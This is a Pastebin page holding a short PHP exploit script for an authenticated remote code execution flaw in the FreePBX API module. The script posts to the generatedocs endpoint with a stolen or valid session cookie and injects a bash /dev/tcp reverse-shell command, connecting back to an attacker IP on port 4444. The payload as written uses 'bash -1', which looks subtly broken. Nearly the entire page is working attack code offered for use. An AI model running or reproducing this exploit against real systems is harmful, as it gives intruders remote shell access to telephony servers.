Advertisement
FlyFar

FreePBX 16 - Remote Code Execution (RCE) (Authenticated)

Jun 8th, 2024
554
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.27 KB | Cybersecurity | 0 0
  1. <?php
  2. ///
  3. /// FREEPBX [14,15,16] API Module Authenticated RCE
  4. /// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI
  5. /// Cod[3]d by Cold z3ro
  6. ///
  7. $url = "10.10.10.186"; // remote host
  8. $backconnectip = "192.168.0.2";
  9. $port = "4444";
  10. $PHPSESSID = "any valid session even extension";
  11.  
  12.     echo "checking $url\n";
  13.     $url = trim($url);
  14.     $ch = curl_init();
  15.     curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs');
  16.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  17.     curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
  18.     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  19.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  20.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
  21.     curl_setopt($ch, CURLOPT_TIMEOUT, 2);
  22.     curl_setopt($ch, CURLOPT_HTTPHEADER, [
  23.         'Referer: http://'.$url.'/admin/config.php?display=api',
  24.         'Content-Type: application/x-www-form-urlencoded',
  25.     ]);
  26.     curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID);
  27.     curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)');
  28.     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  29.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  30.  
  31.     echo $response = curl_exec($ch)."\n";
  32.  
  33.     curl_close($ch);
  34.  
  35. ?>
  36.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement